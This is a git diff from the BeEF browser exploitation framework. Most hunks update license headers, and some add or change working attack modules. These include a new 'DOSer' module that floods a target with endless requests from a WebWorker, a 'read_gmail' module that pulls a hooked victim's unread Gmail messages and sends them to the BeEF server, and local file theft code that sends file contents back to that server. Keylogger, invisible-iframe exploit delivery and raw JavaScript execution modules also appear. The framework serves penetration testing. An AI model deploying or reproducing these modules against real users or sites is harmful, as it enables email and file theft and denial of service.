beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = '<%= @sploit_url %>'; diff --git a/modules/metasploit/browser_autopwn/config.yaml b/modules/metasploit/browser_autopwn/config.yaml index f2d6c67ce..382184750 100644 --- a/modules/metasploit/browser_autopwn/config.yaml +++ b/modules/metasploit/browser_autopwn/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/metasploit/browser_autopwn/module.rb b/modules/metasploit/browser_autopwn/module.rb index 1cebf51ac..63a865176 100644 --- a/modules/metasploit/browser_autopwn/module.rb +++ b/modules/metasploit/browser_autopwn/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Browser_autopwn < BeEF::Core::Command diff --git a/modules/misc/google_search/command.js b/modules/misc/google_search/command.js index 93366a3d5..4b8918313 100644 --- a/modules/misc/google_search/command.js +++ b/modules/misc/google_search/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var query = '<%= @query.gsub(/'/, "\\'") %>'; diff --git a/modules/misc/google_search/config.yaml b/modules/misc/google_search/config.yaml index bc0cc6b8f..fbe897d02 100644 --- a/modules/misc/google_search/config.yaml +++ b/modules/misc/google_search/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/google_search/module.rb b/modules/misc/google_search/module.rb index afec66958..830029367 100644 --- a/modules/misc/google_search/module.rb +++ b/modules/misc/google_search/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Google_search < BeEF::Core::Command diff --git a/modules/misc/iframe_keylogger/command.js b/modules/misc/iframe_keylogger/command.js index 7f1ed6fd1..d509f1517 100644 --- a/modules/misc/iframe_keylogger/command.js +++ b/modules/misc/iframe_keylogger/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // logged keystrokes array diff --git a/modules/misc/iframe_keylogger/config.yaml b/modules/misc/iframe_keylogger/config.yaml index f65092754..78580a1c4 100644 --- a/modules/misc/iframe_keylogger/config.yaml +++ b/modules/misc/iframe_keylogger/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/iframe_keylogger/module.rb b/modules/misc/iframe_keylogger/module.rb index 6156f8ecd..1f06dc176 100644 --- a/modules/misc/iframe_keylogger/module.rb +++ b/modules/misc/iframe_keylogger/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_keylogger < BeEF::Core::Command diff --git a/modules/misc/iframe_sniffer/command.js b/modules/misc/iframe_sniffer/command.js index 21e6987d5..65edd2462 100644 --- a/modules/misc/iframe_sniffer/command.js +++ b/modules/misc/iframe_sniffer/command.js @@ -1,19 +1,10 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var inputURL = '<%= @inputUrl %>'; var anchorsToCheck = '<%= @anchorsToCheck %>'; @@ -33,7 +24,7 @@ beef.execute(function() { var leakyscript = document.createElement('script'); leakyscript.setAttribute('type', 'text/javascript'); - leakyscript.setAttribute('src', 'http://'+beef.net.host+':'+beef.net.port+'/leakyframe.js'); + leakyscript.setAttribute('src', beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/leakyframe.js'); var theparent = document.getElementsByTagName('head')[0]; theparent.insertBefore(leakyscript, theparent.firstChild); } diff --git a/modules/misc/iframe_sniffer/config.yaml b/modules/misc/iframe_sniffer/config.yaml index 61c796fa1..5401ad7bc 100644 --- a/modules/misc/iframe_sniffer/config.yaml +++ b/modules/misc/iframe_sniffer/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/iframe_sniffer/module.rb b/modules/misc/iframe_sniffer/module.rb index 7af2804af..f98d27b01 100644 --- a/modules/misc/iframe_sniffer/module.rb +++ b/modules/misc/iframe_sniffer/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Iframe_sniffer < BeEF::Core::Command diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js index a0763583c..3bc00a1ce 100644 --- a/modules/misc/invisible_iframe/command.js +++ b/modules/misc/invisible_iframe/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var target = "<%= @target %>"; diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml index b391c048a..46502c69a 100644 --- a/modules/misc/invisible_iframe/config.yaml +++ b/modules/misc/invisible_iframe/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb index 1bfb45b60..571185463 100644 --- a/modules/misc/invisible_iframe/module.rb +++ b/modules/misc/invisible_iframe/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Invisible_iframe < BeEF::Core::Command diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js index 614cdc659..d0cd40942 100644 --- a/modules/misc/local_file_theft/command.js +++ b/modules/misc/local_file_theft/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // local_file_theft // // Shamelessly plagurised from kos.io/xsspwn @@ -228,9 +219,9 @@ result = ''; function grabFiles(dir,os){ tmpfile = {} for (i in fileList[os]['post']){ - console.log('dir = ' + dir); - console.log('fileList: ' + fileList[os]['post'][i]); - console.log(i); + beef.debug('dir = ' + dir); + beef.debug('fileList: ' + fileList[os]['post'][i]); + beef.debug(i); tmpfile[i] = new XMLHttpRequest() tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]); tmpfile[i].send(); @@ -238,7 +229,7 @@ result = ''; tmpfile[i].onreadystatechange=function(){ for (j in fileList[os]['post']){ if(tmpfile[j].readyState==4){ - console.log('new returned for: ' + j); + beef.debug('new returned for: ' + j); result = j +": "+ tmpfile[j].responseText; beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result); diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml index d6b2c0be4..18f07358f 100644 --- a/modules/misc/local_file_theft/config.yaml +++ b/modules/misc/local_file_theft/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb index 20dd2a5a9..f1193eceb 100644 --- a/modules/misc/local_file_theft/module.rb +++ b/modules/misc/local_file_theft/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # local_file_theft # diff --git a/modules/misc/raw_javascript/command.js b/modules/misc/raw_javascript/command.js index 15ece6d01..4d990e076 100644 --- a/modules/misc/raw_javascript/command.js +++ b/modules/misc/raw_javascript/command.js @@ -1,33 +1,24 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -beef.execute(function() { - var result; - - try { - result = function() {<%= @cmd %>}(); - } catch(e) { - for(var n in e) - result+= n + " " + e[n] + "\n"; - } - - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); -}); - - - - - - +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var result; + + try { + result = function() {<%= @cmd %>}(); + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); +}); + + + + + + diff --git a/modules/misc/raw_javascript/config.yaml b/modules/misc/raw_javascript/config.yaml index 3f9512332..50c5350fd 100644 --- a/modules/misc/raw_javascript/config.yaml +++ b/modules/misc/raw_javascript/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/misc/raw_javascript/module.rb b/modules/misc/raw_javascript/module.rb index 5a507d0b8..dcc067b3b 100644 --- a/modules/misc/raw_javascript/module.rb +++ b/modules/misc/raw_javascript/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Raw_javascript < BeEF::Core::Command diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/misc/read_gmail/command.js similarity index 54% rename from modules/exploits/zenoss_daemon_csrf/command.js rename to modules/misc/read_gmail/command.js index 4b753f8ea..680c50088 100644 --- a/modules/exploits/zenoss_daemon_csrf/command.js +++ b/modules/misc/read_gmail/command.js @@ -14,19 +14,31 @@ // limitations under the License. // beef.execute(function() { - var base = '<%= @base %>'; - var service = '<%= @service %>'; - var action = '<%= @action %>'; + var result; - var zenoss_daemon_iframe = beef.dom.createInvisibleIframe(); - zenoss_daemon_iframe.setAttribute('src', base+'/zport/About?action='+action+'&daemon='+service+'&manage_daemonAction%3Amethod='+action); - - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); - - cleanup = function() { - document.body.removeChild(zenoss_daemon_iframe); - } - setTimeout("cleanup()", 15000); + try { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/feed/atom', false); + x.send(); + str = x.responseText; var re = /message_id=([A-Z,a-z,0-9]*)/g; + var match; + while(match = re.exec(str)) { + x = new XMLHttpRequest(); + x.open('get', 'https://mail.google.com/mail/u/0/h/?&v=om&th='+match[1]+'&f=1&f=1', false); + x.send(); + result += x.responseText; + } + + } catch(e) { + for(var n in e) + result+= n + " " + e[n] + "\n"; + } + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); }); + + + + + diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/misc/read_gmail/config.yaml similarity index 64% rename from modules/chrome_extensions/get_chrome_extensions/config.yaml rename to modules/misc/read_gmail/config.yaml index 69718be2e..2b0baefbf 100644 --- a/modules/chrome_extensions/get_chrome_extensions/config.yaml +++ b/modules/misc/read_gmail/config.yaml @@ -15,12 +15,11 @@ # beef: module: - detect_chrome_extensions: + read_gmail: enable: true - category: "Chrome Extensions" - name: "Get Chrome Extensions" - description: "This module detects if any of the top 1,000 Chrome extensions are installed." - authors: ["koto", "bcoles"] + category: "Misc" + name: "Read Gmail" + description: "If we are able to run in the context of mail.google.com (either by SOP bypass or other issue) then lets go read some email, grabs unread message ids from gmails atom feed, then grabs conent of each message" + authors: ["mh"] target: - working: ["C"] - not_working: ["All"] + user_notify: ['ALL'] diff --git a/modules/chrome_extensions/get_chrome_extensions/module.rb b/modules/misc/read_gmail/module.rb similarity index 74% rename from modules/chrome_extensions/get_chrome_extensions/module.rb rename to modules/misc/read_gmail/module.rb index fa42f2e97..d0ec4d52c 100644 --- a/modules/chrome_extensions/get_chrome_extensions/module.rb +++ b/modules/misc/read_gmail/module.rb @@ -13,16 +13,14 @@ # See the License for the specific language governing permissions and # limitations under the License. # -# More info: -# http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html -# -class Detect_chrome_extensions < BeEF::Core::Command - - def post_execute - content = {} - content['extension'] = @datastore['extension'] - save content - end +class Read_gmail < BeEF::Core::Command -end + # + # This method is being called when a zombie sends some + # data back to the framework. + # + def post_execute + save({'result' => @datastore['result']}) + end +end diff --git a/modules/network/DOSer/command.js b/modules/network/DOSer/command.js new file mode 100644 index 000000000..0c4307722 --- /dev/null +++ b/modules/network/DOSer/command.js @@ -0,0 +1,33 @@ +// +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var url = '<%= @url %>'; + var delay = '<%= @delay %>'; + var method = '<%= @method %>'; + var post_data = '<%= @post_data %>'; + + if(!!window.Worker){ + var myWorker = new Worker(beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/worker.js'); + + myWorker.onmessage = function (oEvent) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data); + }; + + var data = {}; + data['url'] = url; + data['delay'] = delay; + data['method'] = method; + data['post_data'] = post_data; + + myWorker.postMessage(data); + }else{ + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.'); + } + + +}); diff --git a/modules/network/DOSer/config.yaml b/modules/network/DOSer/config.yaml new file mode 100644 index 000000000..553f3f934 --- /dev/null +++ b/modules/network/DOSer/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + doser: + enable: true + category: "Network" + name: "DOSer" + description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run." + authors: ["antisnatchor"] + target: + working: ["ALL"] diff --git a/modules/network/DOSer/module.rb b/modules/network/DOSer/module.rb new file mode 100644 index 000000000..625a98151 --- /dev/null +++ b/modules/network/DOSer/module.rb @@ -0,0 +1,26 @@ +# +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Doser < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js') + end + + def self.options + return [ + {'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'}, + {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'}, + {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'}, + {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'} + ] + end + + def post_execute + return if @datastore['result'].nil? + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/network/DOSer/worker.js b/modules/network/DOSer/worker.js new file mode 100644 index 000000000..70a0db010 --- /dev/null +++ b/modules/network/DOSer/worker.js @@ -0,0 +1,45 @@ +var url = ""; +var delay = 0; +var method = ""; +var post_data = ""; +var counter = 0; + +onmessage = function (oEvent) { + url = oEvent.data['url']; + delay = oEvent.data['delay']; + method = oEvent.data['method']; + post_data = oEvent.data['post_data']; + doRequest(); +}; + +function noCache(u){ + var result = ""; + if(u.indexOf("?") > 0){ + result = "&" + Date.now() + Math.random(); + }else{ + result = "?" + Date.now() + Math.random(); + } + return result; +} + +function doRequest(){ + setInterval(function(){ + + var xhr = new XMLHttpRequest(); + xhr.open(method, url + noCache(url)); + xhr.setRequestHeader('Accept','*/*'); + xhr.setRequestHeader("Accept-Language", "en"); + if(method == "POST"){ + xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); + xhr.send(post_data); + }else{ + xhr.send(null); + } + counter++; + + },delay); + + setInterval(function(){ + postMessage("Requests sent: " + counter); + },10000); +} \ No newline at end of file diff --git a/modules/network/detect_soc_nets/command.js b/modules/network/detect_soc_nets/command.js index 333bce662..d33d623c5 100644 --- a/modules/network/detect_soc_nets/command.js +++ b/modules/network/detect_soc_nets/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var facebookresult = ""; @@ -26,7 +17,7 @@ beef.execute(function() { img.setAttribute("style","visibility:hidden"); img.setAttribute("width","0"); img.setAttribute("height","0"); - img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date(); + img.src = 'https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD?'+ new Date(); img.id = 'gmailimg'; img.setAttribute("attr","start"); img.onerror = function() { diff --git a/modules/network/detect_soc_nets/config.yaml b/modules/network/detect_soc_nets/config.yaml index 90a1c6355..8814d0585 100644 --- a/modules/network/detect_soc_nets/config.yaml +++ b/modules/network/detect_soc_nets/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/network/detect_soc_nets/module.rb b/modules/network/detect_soc_nets/module.rb index 8cb1549e1..b31ad4415 100644 --- a/modules/network/detect_soc_nets/module.rb +++ b/modules/network/detect_soc_nets/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_soc_nets < BeEF::Core::Command diff --git a/modules/network/detect_tor/command.js b/modules/network/detect_tor/command.js index 